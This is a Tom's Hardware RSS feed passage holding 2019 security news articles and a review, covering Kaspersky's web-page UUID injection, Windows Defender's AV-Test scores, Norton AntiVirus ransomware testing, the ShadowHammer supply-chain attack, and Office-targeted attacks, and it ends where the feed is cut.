                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1510px;"><p class="vanilla-image-block" style="padding-top:66.62%;"><img id="" name="" alt="Credit: Sharaf Maksumov / Shutterstock" src="https://cdn.mos.cms.futurecdn.net/KEnfyeai4qh55HsSh3GQAG.jpg" mos="https://cdn.mos.cms.futurecdn.net/KEnfyeai4qh55HsSh3GQAG.jpg" align="" fullscreen="1" width="1510" height="1006" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/KEnfyeai4qh55HsSh3GQAG.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="credit" itemprop="copyrightHolder">(Image credit: Sharaf Maksumov / Shutterstock)</span></figcaption></figure><p>C't today <a href="https://www.heise.de/ct/artikel/Kasper-Spy-Kaspersky-Anti-Virus-puts-users-at-risk-4496138.html">reported</a> that Kaspersky injected a Universally Unique Identifier (UUID) into the HTML source of all web pages without user consent. Previous versions of the antivirus software generated a UUID for each user; a July 11 patch changed it to a not-so-unique identifier but didn't stop the injection.</p><p>UUIDs are nearly ubiquitous. Companies use them to identify users, devices, and other entities that need to be tracked. But if these identifiers aren't properly managed, they could be used for nefarious purposes. Bluetooth stopped advertising unique identifiers, for example, because hackers were using them to stalk people. Other companies have taken similar precautions with the tools they use, whether they're UUIDs or something else, as identifiers.</p><p>Kaspersky essentially did the opposite. C't said it discovered in June that the antivirus software was injecting a string containing a UUID into every web page they visited. 
It's not clear why these UUIDs were injected--although one feature that marked certain Google search results as "safe" might be the culprit--or how they were supposed to be used. The company simply generated and injected these UUIDs into web pages without user consent.</p><p>C't said it built a simple website capable of collecting these UUIDs before reporting the issue to Kaspersky. It then engaged in a bit of back-and-forth with the company regarding the severity of the problem, and watched as Kaspersky <a href="https://support.kaspersky.com/general/vulnerability.aspx?el=12430#110719">released the patch</a> in July. But further testing showed that Kaspersky hadn't stopped injecting this string into its users' browsing activity; it merely ditched the UUID for a static identifier.</p><p>That change does reduce the privacy impact of Kaspersky's code injection. It doesn't completely remove the risk to its customers, though, because knowing that someone uses Kaspersky could still be a valuable piece of information. Anyone relying on previous versions of the antivirus--which likely contain vulnerabilities patched in more recent versions--could be targeted because the tool that was supposed to protect them revealed a weakness.</p><p>We said <a href="https://www.tomshardware.com/news/windows-defender-perfect-scores-av-test,40139.html">earlier this week</a> that improvements to Windows Defender made it hard to recommend third-party antivirus solutions for Windows 10. Knowing that Kaspersky gave website operators an easy way to track its users without their knowledge or consent makes that recommendation even harder to make. People bought a tool so they could defend their systems, but instead, they got one that intentionally broadcast a unique identifier to the world.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Windows Defender Gets Perfect Scores in Antivirus Test ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/windows-defender-perfect-scores-av-test,40139.html</link>
                                                                            <description>
                            <![CDATA[ AV-Test, an independent organization that evaluates security products, gave Windows Defender perfect scores across its three evaluation categories. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">NNwa8freSMfn5z3wcVXfSJ</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/fmLgGKxhVXdxuWf79Anwpj-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 12 Aug 2019 17:04:02 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:08 +0000</updated>
                                                                                                                                            <category><![CDATA[Antivirus]]></category>
                                                    <category><![CDATA[Software]]></category>
                                                    <category><![CDATA[Security Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Nathaniel Mott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/hEFeUwJHtzVDWEZTcjDqt9.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/fmLgGKxhVXdxuWf79Anwpj-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/fmLgGKxhVXdxuWf79Anwpj-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1500px;"><p class="vanilla-image-block" style="padding-top:66.67%;"><img id="" name="" alt="Credit: Shutterstock" src="https://cdn.mos.cms.futurecdn.net/fmLgGKxhVXdxuWf79Anwpj.jpg" mos="https://cdn.mos.cms.futurecdn.net/fmLgGKxhVXdxuWf79Anwpj.jpg" align="" fullscreen="1" width="1500" height="1000" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/fmLgGKxhVXdxuWf79Anwpj.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="credit" itemprop="copyrightHolder">(Image credit: Shutterstock)</span></figcaption></figure><p>Performance issues, privacy concerns and other problems make it harder than ever to recommend third-party antivirus solutions on Windows. Now it's about to become even more difficult: <a href="https://www.techspot.com/news/81396-windows-defender-ranked-joint-best-antivirus-program.html">TechSpot</a> reported that AV-Test, an independent organization that evaluates security products, gave Windows Defender <a href="https://www.av-test.org/en/antivirus/home-windows/windows-10/june-2019/microsoft-windows-defender-4.18-192315/">perfect scores</a> across its three evaluation categories after testing 20 antivirus products made for <a href="https://www.tomshardware.com/reviews/get-windows-10-free-or-cheap,5717.html">Windows 10</a> throughout May and June.</p><p>AV-Test <a href="https://www.av-test.org/en/antivirus/home-windows/">rated each security offering</a> based on its protection, performance and usability. The highest possible score in each category was six (the organization's use of half-point values results in a 12-point scale). 
Windows Defender 4.18, F-Secure SAFE 17, Kaspersky Internet Security 19 and Norton Security 22.17 were the only services to receive perfect scores in all three categories. Many others stumbled in several important areas.</p><p>This doesn't mean systems running these solutions are impervious to attack. That level of perfection--despite what some may claim--isn't feasible. Instead, these perfect scores mean the offerings defended against known threats with a minimal impact on performance and without undue frustration. (More information about how AV-Test evaluates <a href="https://www.av-test.org/en/about-the-institute/test-procedures/test-modules-under-windows-protection/">protection</a>, <a href="https://www.av-test.org/en/about-the-institute/test-procedures/test-modules-under-windows-performance/">performance</a> and <a href="https://www.av-test.org/en/about-the-institute/test-procedures/test-modules-under-windows-usability/">usability</a> is on its website.) Nothing's truly perfect.</p><p>These findings show that Windows Defender is just as good as leading third-party antivirus solutions. It's almost enough to make us feel bad for these other companies; it's hard to compete with a well-performing solution that comes bundled with Windows 10 and is made by Microsoft. Just ask Netscape. The main difference is that people can actually benefit from Microsoft's efforts rather than suffering because of its monopolistic impulses.</p><p>Antivirus solutions can sometimes create more problems than they solve. Installing them gives another company nearly complete access to a system, and that access can be abused, as "cleaner" utilities <a href="https://www.tomshardware.com/news/windows-defender-removes-cleaner-programs,36432.html">have demonstrated</a>. Antivirus solutions can also <a href="https://www.tomshardware.com/news/antivirus-programs-bypassed-cia-wikileaks,33845.html">have their own vulnerabilities</a> for attackers to exploit. 
Many also <a href="https://www.forbes.com/sites/andygreenberg/2012/01/11/lawsuit-claims-symantec-scareware-warns-of-fake-threats-to-sell-upgrades/#1a103a221aac">prey on non-savvy users</a> to push other services, too, or constantly attempt to get the user's attention for practically no reason.</p><p>Windows Defender is supposed to--and according to AV-Test's findings actually does--offer many of the benefits of third-party antivirus solutions without as many of the drawbacks. Microsoft went a bit too far to push Windows Defender a few years ago, which is why it <a href="https://www.tomshardware.com/news/microsoft-antivirus-policies-antitrust-complaints,35204.html">ultimately capitulated to</a> Kaspersky's complaints about anti-competitive practices, but it's hard to argue against good cyber security.</p><p>Like we said: Windows Defender isn't perfect. It has its own vulnerabilities, and we're sure that some Windows 10 users have been annoyed by the utility, too. But at least people who don't want or can't afford other antivirus solutions have a built-in utility that bests other free options.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Norton AntiVirus Software Review: Easy on the PC ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/reviews/norton-antivirus-cyber-security-software,6220.html</link>
                                                                            <description>
                            <![CDATA[ Norton AntiVirus is precise and easy to use but disappoints when it comes to ransomware protection. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">B3oPkQRu7pCjFaeQeK4tcf</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/GqHSCKeL8GRQpjNQoYmnNR-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Sun, 28 Jul 2019 13:00:00 +0000</pubDate>                                                                                                                                <updated>Thu, 21 Aug 2025 08:54:06 +0000</updated>
                                                                                                                                            <category><![CDATA[Antivirus]]></category>
                                                    <category><![CDATA[Software]]></category>
                                                    <category><![CDATA[Security Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Jonas DeMuro ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/ugiZMTHAouonmwAuGxT6s.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/GqHSCKeL8GRQpjNQoYmnNR-1280-80.jpg">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/GqHSCKeL8GRQpjNQoYmnNR-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1414px;"><p class="vanilla-image-block" style="padding-top:56.29%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/GqHSCKeL8GRQpjNQoYmnNR.jpg" mos="https://cdn.mos.cms.futurecdn.net/GqHSCKeL8GRQpjNQoYmnNR.jpg" align="" fullscreen="1" width="1414" height="796" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/GqHSCKeL8GRQpjNQoYmnNR.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p>Norton AntiVirus has been around since 1991, making it one of the oldest antivirus software solutions.</p><p>For this review, we used Norton AntiVirus Basic. However, Norton has since discontinued Basic and replaced it with Norton Antivirus Plus. The two are virtually the same, with the same core security features, such as the underlying malware engine and associated services. However, Plus comes with bonus features: 2GB of cloud backup, a web management portal and a two-way firewall.</p><p>Norton AntiVirus users also get threat detection of previously identified malware, intelligent behavior monitoring, a file reputation service that spots new hazards and powerful anti-phishing technology. It also includes Norton Identity Safe, which is a password manager but has fewer features than some competitors.</p><p>There are a lot of features, but we found some flaws in the software’s ability to detect new ransomware threats.</p><h2 id="price-2">Price</h2><p>The initial annual subscription costs $39.99 for a one-computer, one-year license, with renewals costing $59.99 (about £45) per subsequent year.</p><p>First-year rates are equal to Bitdefender but pricier than other competitors. Plus, some alternatives offer multiple devices and multi-year license options. 
For example, Bitdefender offers a three-device, three-year license for $83.99 total. Norton falls short by not offering discounts for additional devices.</p><div ><table><tbody><tr><td  ><strong>Software</strong></td><td  ><strong>First Year Price (One Device)</strong></td><td  ><strong>Renewal Price (Per Year)</strong></td></tr><tr><td  >Norton</td><td  >$39.99 per year or $6 per month</td><td  >$60</td></tr><tr><td  >Bitdefender</td><td  >$39.99</td><td  >$60</td></tr><tr><td  >Webroot SecureAnywhere</td><td  >$29.99</td><td  >$39.99</td></tr><tr><td  >Kaspersky Anti-Virus</td><td  >$29.99</td><td  >$29.99</td></tr><tr><td  >Trend Micro Antivirus Plus</td><td  >$29.95</td><td  >$29.95</td></tr></tbody></table></div><p>Unfortunately, there’s no free trial for Norton AntiVirus. A Norton rep told us there is a 60-day money-back guarantee. However, you’ll still have to pay upfront, and having to request a refund is less appealing than a simple free trial offer.</p><p>If you’re willing to pay more, note Norton also offers other antivirus packages: <br/>●    <strong>Norton 360 Standard:</strong> $8/month, $80/year, one device <br/>●    <strong>Norton 360 Deluxe:</strong> $10/month, $100/year, five devices<br/>●    <strong>Norton 360 with LifeLock Select:</strong> $15/month, $150/year, five devices<br/>●    <strong>Norton 360 with LifeLock Advantage:</strong> $25/month, $250/year, 10 devices<br/>●    <strong>Norton 360 with LifeLock Ultimate Plus:</strong> $35/month, $350/year, unlimited devices</p><h2 id="setup-and-user-interface-2">Setup and User Interface</h2><p>The install process is really easy. However, during our setup process, the software identified another antivirus software which was already installed, Bitdefender, and asked to uninstall it. There was an option to keep it, though, which we appreciate. 
We also like that we were warned about a potential issue, and that the user gets to be the final arbiter of which software goes on their system.</p><p>During setup, Norton offers to install some browser extensions. One is Norton Safe Web, which warns users of dangerous websites. The other extension, Norton Identity Safe, gives the functions of a password manager. We consider them both valuable extras, but such software can be found as freeware, so Norton is only adding minimal value.</p><p>With the suite fully installed, it occupied 1.6GB of disk space, more than many competitors. Thankfully, with the larger C: drives these days, this shouldn’t be an issue. And Norton did not negatively impact our system resources otherwise. Plus, this software comes with 2GB of free online storage, although that is a very small amount of space.</p><p>Examining our test PC’s background processes, we found only three, including the Chrome extension host, consuming less than 50MB of RAM, and they ran perfectly fine with no system slowdowns.</p><p>Norton AntiVirus offers plenty of options and controls. The complete details of your PC’s protection status are cleanly displayed, including the timing of your last update and scan, with buttons organized into functional groups: Security, Online Safety and Backup. Clicking on the buttons displays additional options, with total control of all the antivirus settings.</p><h2 id="antivirus-scans-2">Antivirus Scans</h2><p>We found Norton’s scan tool simultaneously comprehensive and easy to use. Checking your system is as easy as clicking Security -> Scans to start a scan immediately. There’s a choice of available modes, Quick or Full, plus a Custom Scan option to focus the scan on specific drives, folders or files to clear out malware.</p><p>Norton missed the mark by lacking options for lower level scans, unlike Avast or Avira. 
These competing programs offer more than just an archives scan, also allowing the user to specify the types of archives and the depth of nesting to support (i.e., how many nested archives to open). Still, the average user will be okay with what Norton offers.</p><p>For example, you can create a custom scan, such as one that checks D:\Files and E:\More and skips certain scan types, like rootkits or tracking cookies, to save time. Running can be automated with specific parameters, such as when the system is idle and on AC power.<br/>You can also control what happens upon scan completion, including turning off the PC or putting it into sleep mode. While power users may find additional options elsewhere, mainstream users will be able to easily comprehend and use these custom features.</p><p>Performance-wise, scans use multiple CPU threads; however, Norton is not overly grabby of system resources and will give back those threads when needed for another demanding application to optimize system performance.</p><h2 id="antivirus-testing-and-performance-2">Antivirus Testing and Performance</h2><p>Overall, Norton’s speeds were quite excellent. It also detected all of our test threats, without any false alarms -- a powerful combination for an antivirus software package.</p><p>Our own custom ransomware-like program works through a tree of test folders, opening and encrypting common images, videos and other documents. Since we created it and it’s a novel threat, Norton has not encountered it before, making it an excellent test of the software’s ability to detect and block ransomware by behavior only, without relying on the database of virus signatures for malware identification.</p><p>Norton fizzled when it came to handling our custom ransomware. With the executable test, the ransomware rapidly ground to a stop, which seemed encouraging. However, as we delved deeper, we found that the ransomware had encrypted some files. 
We were even more frustrated when we figured out that Norton provided neither an alert nor a pathway to recover the files.</p><p>We tempted fate and reran our custom ransomware. That resulted in identical performance, with the encryption of a few files before the ransomware went away with zero warnings.</p><p>After the third time running our ransomware, Norton shut it down and displayed an alert with information that a threat was neutralized.</p><p>On one hand, Norton detected and blocked the solitary ransomware. But on the other hand, this occurred with no warning, and there was potential for data loss with the time that elapsed before the detection and deletion of our ransomware. On our PC, the ransomware we ran successfully encrypted 454 files before Norton neutralized it. Competitor Kaspersky showed better performance, stopping our ransomware after the encryption of a handful of files and recovering the originals without loss of any data.</p><p>With testing finished, we assessed Norton’s impact on our system’s performance, with quite favorable results. Looking at the 2018 Consumer Security Products Performance benchmarks with PassMark Software, Norton’s impact on system performance was the lowest among the 15 contenders and performed superior to the minimal-impact Windows Defender. Therefore, while performance of a given software on any PC can be difficult to predict, Norton runs better than most, making this a strong contender for an older system.</p><h2 id="other-security-features-2">Other Security Features</h2><p>Norton Antivirus also includes the Norton Power Eraser feature. It’s an effective tool for more complicated problems that would elude a standard scan. 
The algorithm dives deep to seek out stealthier threats.</p><p>If you’re unsure of where to look to locate a possible threat, there’s Norton Insight, a tool that scans processes to quickly highlight any possible malware, or at least anything worth a closer look.</p><p>The browser extension’s protection from malware is clunkier compared to the sleek desktop software. However, Norton still excels at URL blocking, making this extension well worth installing if your browser doesn’t already have this type of protection.</p><p>Additionally, you’ll find bonus tools that are useful for junk file deletion, hard drive defragging and startup program management. These programs are hardly an afterthought and can go toe-to-toe with their competitors. For example, the Startup Manager can not only list the startup programs, but also display the number of other Norton users using them. Furthermore, it allows the user to specify a delay in startup to smooth out the boot process and also gives the option to turn them off. 
Still, power users will point out that freeware tools, including CCleaner, provide plenty of PC maintenance functionality.</p><h2 id="bottom-line-2">Bottom Line</h2><p>Norton AntiVirus has inherent advantages, such as being accurate, low on system resources, quick and flexible.</p><p>However, alternative antivirus solutions Bitdefender and Kaspersky demonstrated better performance on the critical tasks of ransomware and file recovery.</p><p>But if you’re looking for an antivirus software with minimal impact on your PC, Norton still has quite a high virus detection rate in general.</p><p><em>Image Credits: Norton</em></p><p><br/><strong>MORE: <a href="https://www.tomshardware.com/topics/security/reviews">All Security Reviews</a></strong></p><p><br/><strong>MORE: <a href="https://www.tomshardware.com/topics/security">All Security Content</a></strong></p><iframe src="https://content.jwplatform.com/players/LqlBSXUN.html" id="LqlBSXUN" title="Buy the Right Desktop PC" width="1920" height="1080" frameborder="0" scrolling="auto" allowfullscreen></iframe>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Asus Wasn't the Only One Struck by Operation ShadowHammer ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/operation-shadowhammer-kaspersky-asus-victims-securelist,39156.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky uncovered six other companies that were targets of Operation ShadowHammer, which was recently revealed to have installed backdoors in Asus laptops. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">oAprTGpLyDQ4YBwF2yYsqE</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/jXZJviYpsBrt2cudvjyYLj-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 23 Apr 2019 20:16:01 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:08 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/jXZJviYpsBrt2cudvjyYLj-1280-80.jpg">
                                                            <media:credit><![CDATA[Max Shy/Shutterstock]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/jXZJviYpsBrt2cudvjyYLj-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1000px;"><p class="vanilla-image-block" style="padding-top:66.70%;"><img id="" name="" alt="Credit: Max Shy/Shutterstock" src="https://cdn.mos.cms.futurecdn.net/jXZJviYpsBrt2cudvjyYLj.jpg" mos="https://cdn.mos.cms.futurecdn.net/jXZJviYpsBrt2cudvjyYLj.jpg" align="" fullscreen="1" width="1000" height="667" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/jXZJviYpsBrt2cudvjyYLj.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="credit" itemprop="copyrightHolder">(Image credit: Max Shy/Shutterstock)</span></figcaption></figure><p><br/>Security company Kaspersky discovered that <a href="https://www.tomshardware.com/news/asus-live-update-utility-software-hacked-update,38927.html">Asus’ Live Update tool was infected</a> with malware by malicious actors. However, it seemed unlikely that Asus would be the only company to be targeted in such a way. Kaspersky <a href="https://www.kaspersky.com/blog/details-shadow-hammer/26597">confirmed this</a> today by uncovering six other companies that were targets of the same Operation ShadowHammer.</p><h2 id="operation-shadowhammer-infected-multiple-software-tools">Operation ShadowHammer Infected Multiple Software Tools</h2><p>Kaspersky researchers, via the <a href="https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/">SecureList blog</a>, said that the newly found malware samples leveraged algorithms that are similar to those used in the <a href="https://www.tomshardware.com/news/asus-live-update-utility-shadowhammer-malware-cybersecurity,38910.html">attack against Asus</a>. 
</p><p>One of the companies impacted, Electronics Extreme, makes the survival game <em>Infestation</em>: <em>Survivor Stories</em>. The second, Innovative Extremist, is a web and IT infrastructure services provider that has also worked in game development. The third company, Zepetto, is from South Korea and made the video game <em>Point Blank</em>.</p><p>According to Kaspersky’s researchers, the attackers either had access to the source code of these companies’ software or were able to infect their software during compilation. The hackers could have infiltrated the networks of these companies. The researchers noted that this reminded them of how the <a href="https://www.tomshardware.com/news/avast-unknowingly-bundled-malware-ccleaner,35477.html">CCleaner attack happened</a>. Avast’s CCleaner update servers were infiltrated in a similar way, exposing millions of users to a trojanized CCleaner update.</p><p>Kaspersky said that three other South Korean companies were targeted, including another video game company, a conglomerate holding company and a pharmaceutical firm. The cybersecurity firm didn't share their names.</p><h2 id="how-operation-shadowhammer-worked">How Operation ShadowHammer Worked</h2><p>Kaspersky researchers noted that the compromised video games of the first three companies targeted by Operation ShadowHammer were capable of gathering information about usernames, computer specs and configurations, and operating system versions.</p><p>After being launched on the victims’ systems, the infected games would first check whether certain traffic/processor monitoring tools were running and whether the system language was Simplified Chinese or Russian. If either of these was true, the malware within the games would stop running. Otherwise, it would collect the aforementioned system information and more.</p><p>The compromised software could also be used to download new malicious payloads from the attackers’ command and control servers. 
The list of potential victims was not limited to a list of MAC addresses, as was the case with the attack against Asus’ Live Update tool.</p><p>The attackers were able to infect these companies’ software via valid digital certificates, which were used to compromise their development environments. Kaspersky recommends that these companies, and others in their position, not rely only on digital signatures for the security of their software, but also analyze the software code properly even after the code is digitally signed.</p><p>The Kaspersky researchers also warned that there may be many more companies that were targeted by the same group, but the number is currently not known. However, if Operation ShadowHammer succeeded in infecting popular developer tools, then any company that uses those affected developer tools would also be infected.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Most Cyber Attacks Targeted Microsoft Office in Q4 - Kaspersky ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/microsoft-office-cyber-security-flaws-kaspersky,39088.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky Labs said at the Security Analyst Summit that 70 percent of attacks it saw in the fourth quarter of 2018 involved Microsoft Office in some way. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">Jswucz4DQ6hBbjsFQzhUu4</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/bN7wfVQJmUFMasUG7vASiU-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 16 Apr 2019 14:36:02 +0000</pubDate>                                                                                                                                <updated>Tue, 16 Sep 2025 13:28:08 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Nathaniel Mott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/hEFeUwJHtzVDWEZTcjDqt9.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/bN7wfVQJmUFMasUG7vASiU-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/bN7wfVQJmUFMasUG7vASiU-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1000px;"><p class="vanilla-image-block" style="padding-top:80.30%;"><img id="" name="" alt="Credit: Shutterstock" src="https://cdn.mos.cms.futurecdn.net/bN7wfVQJmUFMasUG7vASiU.jpg" mos="https://cdn.mos.cms.futurecdn.net/bN7wfVQJmUFMasUG7vASiU.jpg" align="" fullscreen="1" width="1000" height="803" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/bN7wfVQJmUFMasUG7vASiU.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="credit" itemprop="copyrightHolder">(Image credit: Shutterstock)</span></figcaption></figure><p>Microsoft's products are practically ubiquitous. Sure, Internet Explorer is no longer synonymous with the Internet for many people, but the company's Office productivity suite remains a staple for many Windows users. That's great for Microsoft, but Kaspersky Labs' report that 70 percent of the cyberattacks it saw in the fourth quarter of 2018 targeted Office vulnerabilities suggests that it might not be great for the software's users.</p><p>Kaspersky presented these findings at its <a href="https://sas.kaspersky.com/#wednesday-april-10-2019-conference-day-2-sas">Security Analyst Summit</a> in Singapore last week; <a href="https://www.zdnet.com/article/kaspersky-70-percent-of-attacks-now-target-office-vulnerabilities/">ZDNet reported on the presentation</a> on Monday. According to the publication, Kaspersky said Office was involved in just 16 percent of attacks in Q4 2016. 
That number quadrupled in just two years, and unless there are some dramatic changes with the productivity suite or its popularity, there's little reason to believe it will fall anytime soon.</p><p>Not all of the attacks involving Office vulnerabilities actually rely on flaws in the software itself. Kaspersky noted that attacks will often exploit issues with related components in Windows, or they'll use Office files to make their way onto a target device. Even people who manage to avoid Office typically have to deal with its file types--documents are sent as ".docx", spreadsheets as ".xlsx" and presentations as ".pptx". That's just how it is.</p><p>That means that Microsoft's efforts to secure Office are in some ways limited by factors outside its control. Promising improved security for people who opt for Office 365 instead of the standalone versions of its software is better than nothing, sure. (Even if it seems a bit silly to <a href="https://www.zdnet.com/article/kaspersky-70-percent-of-attacks-now-target-office-vulnerabilities/">pit the products against each other</a>.) But it can't stop attackers from disguising a malicious file as a Word document or sneaking malware into a PowerPoint slide.</p><p>This ubiquity, combined with the ease with which attackers can exploit Office vulnerabilities, makes the rise in attacks involving Office seem like an inevitability. Kaspersky reportedly said there's an entire crime network built around Microsoft's productivity suite. That means there's serious economic incentive to discover Office vulnerabilities, exploit them, sell the exploits and then repeat the process once a given security flaw is fixed.</p><p>Maybe that would change if Office were no longer synonymous with office work. But the productivity suite has withstood increasing competition far better than Internet Explorer did, and even if it's dethroned, people are still going to use Office file formats until they simply can't do so anymore. 
Microsoft, Kaspersky, and other companies simply have to manage each problem as it pops up to the best of their collective ability.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Asus Updates Security Following Operation ShadowHammer Attack ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/asus-implements-new-certificate-structure,39072.html</link>
                                                                            <description>
                            <![CDATA[ Asus implemented a new digital certificate structure that should improve its security ecosystem, but which also requires updates to much of its software. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">ck9g8xhgKQTPWupjpP8wf8</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/NNppct5qfTf99LvJJH7r55-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 15 Apr 2019 14:21:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:02 +0000</updated>
                                                                                                                                            <category><![CDATA[Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Nathaniel Mott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/hEFeUwJHtzVDWEZTcjDqt9.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/NNppct5qfTf99LvJJH7r55-1280-80.jpg">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/NNppct5qfTf99LvJJH7r55-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
